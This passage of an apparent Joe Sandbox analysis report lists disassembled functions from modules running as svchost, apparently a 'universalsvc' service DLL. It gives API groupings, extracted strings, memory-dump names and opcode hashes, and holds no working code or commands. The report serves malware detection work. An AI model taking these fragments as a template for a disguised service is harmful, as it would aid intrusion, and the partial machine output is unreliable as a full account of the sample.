            • VirtualProtect.KERNEL32(?,?,?,?,?,682960F4,?,?,?,?,?,?,68281315), ref: 6828CEB6
            Strings
            • Unknown pseudo relocation bit size %d., xrefs: 6828CF6A
            • Unknown pseudo relocation protocol version %d., xrefs: 6828CFCA
            • VirtualQuery failed for %d bytes at address %p, xrefs: 6828CCBA, 6828CFB3
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: Virtual$ProtectQuery
            • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$ VirtualQuery failed for %d bytes at address %p
            • API String ID: 1027372294-974437099
            • Opcode ID: 2752f869f49eda997246e6d9b4ac340988e297aacd72a7d5716d20230ee3a07e
            • Instruction ID: 7848499f30e46e56733167479c57ee5d6fc3df53bbe755c731f941633a4f6d41
            • Opcode Fuzzy Hash: 2752f869f49eda997246e6d9b4ac340988e297aacd72a7d5716d20230ee3a07e
            • Instruction Fuzzy Hash: ECA122F670060A8AEF549B7AD8507596363BB85BA9FD4C612CD29477D8CB3EC48E8301
            Function 00007FFA417D03F0 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 196COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Xinvalid_argumentstd::_
            • String ID: Format specifier requires numeric argument.$Format specifier requires numeric or pointer argument.$Invalid format string.$Missing precision specifier.$Number is too big$Precision not allowed for this argument type.
            • API String ID: 909987262-255851600
            • Opcode ID: 0f36b4f91cfe552b0b332fe34d1677c8ff5a8c60b8c0a52a4a4efd33c6d47dde
            • Instruction ID: 7ae3f31d1acebf7716d4d69aeba2ccb5cf58abec022f5c5f284e8b3fd6dea5af
            • Opcode Fuzzy Hash: 0f36b4f91cfe552b0b332fe34d1677c8ff5a8c60b8c0a52a4a4efd33c6d47dde
            • Instruction Fuzzy Hash: 9C71A722E0C18985EF67BB09E1546B827B0DB93784F98D831D74D076E3DB6CE5E18B48
            Function 00007FFA4184FC84 Relevance: 21.2, APIs: 14, Instructions: 192fileCOMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Handle$Close$File$ErrorLast$CopyCreate$Information
            • String ID:
            • API String ID: 1679173910-0
            • Opcode ID: 4536d9a9ef9bc617ba03928a9dbe05ca07202005cbdee773ced15659da7c701a
            • Instruction ID: 348df96b1d70706092b05b39a3d2ca6d2e7178b6a0a96c67d9d77d33c564c85d
            • Opcode Fuzzy Hash: 4536d9a9ef9bc617ba03928a9dbe05ca07202005cbdee773ced15659da7c701a
            • Instruction Fuzzy Hash: 0C816321F0C6424AF763AB79944027D26A1AB06BB8F148739DD7D47AE6EF38F505C390
            Function 68285C60 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 80stringCOMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: setlocalestrchrstrcmpstrlenstrrchr
            • String ID: ASCII$CP%s$CP%u$CP936
            • API String ID: 2840338844-1692024362
            • Opcode ID: 182277ec904048f4833963a75aa617e9bd8b241e25b6d7fc156e65e334356766
            • Instruction ID: c7600fd9c23a00d7e0e9bebd6c13a976c1e8ce6dfdd5acbcd16871e33a0f6ef2
            • Opcode Fuzzy Hash: 182277ec904048f4833963a75aa617e9bd8b241e25b6d7fc156e65e334356766
            • Instruction Fuzzy Hash: D62104A630568E94EF188F27E9143A523A2AB45B88FCC8535CD2F07394EF2DC458C710
            Function 00007FFA4185BC74 Relevance: 19.9, APIs: 13, Instructions: 361COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Name::operator+
            • String ID:
            • API String ID: 2943138195-0
            • Opcode ID: 5afc6738595246fa41d918036c2846ac39f96e9284b5c1df2419746a3cd2cb07
            • Instruction ID: eda9a11cdd1257fcd75e17ead01b04823a125ed7aa505dedb7fb628d6a7590e3
            • Opcode Fuzzy Hash: 5afc6738595246fa41d918036c2846ac39f96e9284b5c1df2419746a3cd2cb07
            • Instruction Fuzzy Hash: E6F18B36F0CA829AE703EF64D4901FC37A5EB5634CB408436DA0D67AAADF38E559C740
            Function 00007FFA4185E5D8 Relevance: 19.6, APIs: 5, Strings: 6, Instructions: 359COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: NameName::$Name::operator+
            • String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-$lambda$nullptr
            • API String ID: 826178784-2441609178
            • Opcode ID: 51cfbc52ead9d6b7089eed2ef22e23e23b5873e6bf8bcb9a4d8ab1048defd61b
            • Instruction ID: 19a9c1a0c161ad4f93cf99f1dde804ba1d18524dddd562e4d9b6f7d7f7983d98
            • Opcode Fuzzy Hash: 51cfbc52ead9d6b7089eed2ef22e23e23b5873e6bf8bcb9a4d8ab1048defd61b
            • Instruction Fuzzy Hash: 42F16922F0C61284FB57BF64C9941BCA7A1EF5778CF44C136CA4E26AB6DE3CB5058251
            Function 00007FFA41806D70 Relevance: 19.5, APIs: 3, Strings: 8, Instructions: 269COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
            • String ID: C:\(universalsvc) Service DLL\universalsvc\packages\include\nlohmann\json.hpp$buf[len - 1] != '0'$create_directory$dist <= delta$len >= 1$remove$rest <= delta$ten_k > 0
            • API String ID: 3936042273-4027473493
            • Opcode ID: 3cd59a85e8101090ef8019caa2101bee5f301fc048f74abae58f375a43937c83
            • Instruction ID: 2fa893ad22f5a3a963e52f5fa49f53eb4116d698a413378db807f73ec1a40921
            • Opcode Fuzzy Hash: 3cd59a85e8101090ef8019caa2101bee5f301fc048f74abae58f375a43937c83
            • Instruction Fuzzy Hash: CA91E562B1CB8A41EF13EB62E4401796761EB46BE4F648635EA5D07BE6DF6CF481C300
            Function 68281940 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 169stringCOMMON
            Download Yara Rule
            APIs
            • pthread_rwlock_rdlock.LIBWINPTHREAD-1 ref: 68281966
            • strlen.MSVCRT ref: 68281977
              • Part of subcall function 68283500: strlen.MSVCRT ref: 68283575
              • Part of subcall function 68283500: strlen.MSVCRT ref: 68283598
              • Part of subcall function 68283500: strlen.MSVCRT ref: 682835BA
              • Part of subcall function 68283500: strlen.MSVCRT ref: 682835DB
              • Part of subcall function 68283500: strlen.MSVCRT ref: 682835F7
              • Part of subcall function 68283500: strlen.MSVCRT ref: 68283603
              • Part of subcall function 68283500: malloc.MSVCRT ref: 68283612
            • pthread_rwlock_unlock.LIBWINPTHREAD-1 ref: 682819D9
            • _strdup.MSVCRT ref: 68281A73
            • pthread_rwlock_wrlock.LIBWINPTHREAD-1 ref: 68281AC8
            • strlen.MSVCRT ref: 68281AD9
            • pthread_rwlock_unlock.LIBWINPTHREAD-1 ref: 68281B43
            • free.MSVCRT ref: 68281B64
            • free.MSVCRT ref: 68281B7B
            • abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,POSIX,?,?,6829FC06), ref: 68281BC8
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: strlen$freepthread_rwlock_unlock$_strdupabortmallocpthread_rwlock_rdlockpthread_rwlock_wrlock
            • String ID: POSIX
            • API String ID: 2621910772-397921758
            • Opcode ID: 8b4f2b39b8d97997c3be6eff95473a80323d59d398344c685dff2fea4de45433
            • Instruction ID: aa5b84106ae72cb9e6c5de2ac422163aa92ff2da87194c78adeb97b4ad97f57b
            • Opcode Fuzzy Hash: 8b4f2b39b8d97997c3be6eff95473a80323d59d398344c685dff2fea4de45433
            • Instruction Fuzzy Hash: F3517EB6305A4985EF24CB16E85476AB3A4FB85BC5FC48225DEB947BD4EF38C089C700
            Function 6828A8C7 Relevance: 18.2, APIs: 12, Instructions: 199COMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: realloc
            • String ID:
            • API String ID: 471065373-0
            • Opcode ID: 1bd1ad42625a25576ddee770d907f277b401a28359c31fbf83a96b83cbae493f
            • Instruction ID: 8ecf840fec1bc17a237b0d567b5a045c17d8e3f7fdeb30295c86988d4f35b1c4
            • Opcode Fuzzy Hash: 1bd1ad42625a25576ddee770d907f277b401a28359c31fbf83a96b83cbae493f
            • Instruction Fuzzy Hash: 1C7160B7A01B8D89DF108FAAD45029C23B1F748B98F814A26DE7E67BD8DF34C1958351
            Function 00007FFA4185059C Relevance: 18.2, APIs: 12, Instructions: 167COMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: FileHandle$ErrorInformationLast$Close__std_fs_open_handle$CreateFeatureMovePresentProcessor_invalid_parameter_noinfo
            • String ID:
            • API String ID: 4246490064-0
            • Opcode ID: c2bdbfb8884f53fee82588d9c5f359d968644dc67c428822b3156ac7b55f4487
            • Instruction ID: 8761b6bd9cc7ad3ab35bd1dab25c8e61d301222c0dc08ab2b2a907b038ad94e8
            • Opcode Fuzzy Hash: c2bdbfb8884f53fee82588d9c5f359d968644dc67c428822b3156ac7b55f4487
            • Instruction Fuzzy Hash: B6619121F0C34289F723AFB598055BD26A1EF467ACF648235CD1E96AE4DF29F441C710
            Function 00007FFA417D2D80 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 423COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: std::_$Lockit$Lockit::_Lockit::~__invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskFacet_RegisterXinvalid_argument
            • String ID: integral cannot be stored in wchar_t
            • API String ID: 3363080787-1689078516
            • Opcode ID: 649e0f73ad288bdad85242fbc33052c03429710de04f2dcba5317f1c0d0e830e
            • Instruction ID: dc8a9986d1ab7f5163670b372cda800fe291d8bca14da9b8bb717c67e162d2ca
            • Opcode Fuzzy Hash: 649e0f73ad288bdad85242fbc33052c03429710de04f2dcba5317f1c0d0e830e
            • Instruction Fuzzy Hash: 2302D262A0C78585FB13EB64E5402BC77B1FB86798F548631DA8D13AA6DF3CE481CB04
            Function 00007FFA417F1A70 Relevance: 17.8, APIs: 5, Strings: 5, Instructions: 332COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn
            • String ID: ; expected $; last read: '$syntax error $unexpected $while parsing
            • API String ID: 3668304517-4239264347
            • Opcode ID: f9aa77f71ea7ba2770eacd87e46acd28db4e9bfa7eecfb8b46f91a0c1d743d95
            • Instruction ID: 8ecb68622a797f9dcc81da901b653a7385ad4fc205fa4b3eac770c845c6096ac
            • Opcode Fuzzy Hash: f9aa77f71ea7ba2770eacd87e46acd28db4e9bfa7eecfb8b46f91a0c1d743d95
            • Instruction Fuzzy Hash: 76E1DC62F1868589FB12ABA1C4403ED2772EB467E8F508235DE1D1BAEBDF78D481C744
            Function 00007FFA417E7460 Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 321COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn$EntryInterlockedListNamePush__un
            • String ID: #$', stored '$', trying to retrieve '$NameValuePairs: type mismatch for '
            • API String ID: 4073222981-3687095204
            • Opcode ID: 00287a3abf2aa9fb01015fcbd90881ea487059c7da2b0eacd4a9c17f68b32d84
            • Instruction ID: 99385be45c569170a2793b51308ea6b74d93987821e75dc02274ea4391472c8a
            • Opcode Fuzzy Hash: 00287a3abf2aa9fb01015fcbd90881ea487059c7da2b0eacd4a9c17f68b32d84
            • Instruction Fuzzy Hash: C2D1A562E1CB8581EB03DB65D4413AD6761EBA6798F509331EA6C126E6EF78E1C0C740
            Function 00007FFA417D2510 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 123COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Xinvalid_argumentstd::_
            • String ID: Can not switch from automatic to manual indexing$Can not switch from manual to automatic indexing$Invalid format string.$Number is too big$Precision not allowed for this argument type.
            • API String ID: 909987262-435359029
            • Opcode ID: 9b856d78c471b6c35b0c142e0dc81614399d0c1fa8a0b60b3d8d214c417cb35a
            • Instruction ID: acada3ea8bfc142ebcc3e817ef07b528bccbc89d4d8a0c61b9608f3f24b4724c
            • Opcode Fuzzy Hash: 9b856d78c471b6c35b0c142e0dc81614399d0c1fa8a0b60b3d8d214c417cb35a
            • Instruction Fuzzy Hash: 6641C822A0C64A86E717AB28D0502BD63B0FF52744F948532D75E425F6EF2DE592CB44
            Function 00007FFA417DD170 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 108COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Xinvalid_argumentstd::_
            • String ID: Can not switch from automatic to manual indexing$Can not switch from manual to automatic indexing$Invalid format string.$Number is too big$Precision not allowed for this argument type.
            • API String ID: 909987262-435359029
            • Opcode ID: 939c25b8b0e087ed4ea9a280ac21a0873e20635cab4c111c9000ecd9a76c65dc
            • Instruction ID: d106cd97093c32db6f7f3c7f2beeb8146a0dce7adab95ea4178d0197644456ce
            • Opcode Fuzzy Hash: 939c25b8b0e087ed4ea9a280ac21a0873e20635cab4c111c9000ecd9a76c65dc
            • Instruction Fuzzy Hash: C841B022A0C98E86E727AB28C0552B923B0EB57750F54C932D36D425F7EF2DF592CA04
            Function 00007FFA417ED5A0 Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 88libraryloaderCOMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: AddressHandleModuleProc
            • String ID: N/A$RtlGetVersion$Windows 10$Windows 11$Windows 7$Windows 8$Windows 8.1$ntdll.dll
            • API String ID: 1646373207-598478174
            • Opcode ID: 6c5f91436bfd3d17f716e9a4117406aca104a84b41777372b9a56a1694798d57
            • Instruction ID: a2d6234ce4ebb71d41d70cbf2c6976e5b3a0ca7c5d641a30708a23b9a3649bbb
            • Opcode Fuzzy Hash: 6c5f91436bfd3d17f716e9a4117406aca104a84b41777372b9a56a1694798d57
            • Instruction Fuzzy Hash: BB418131A1C74681FBA3AB11E8506B923F0EF46B84F50C132D94D466A6EF7CE6948F45
            Function 00007FFA41859B5C Relevance: 16.7, APIs: 11, Instructions: 158COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
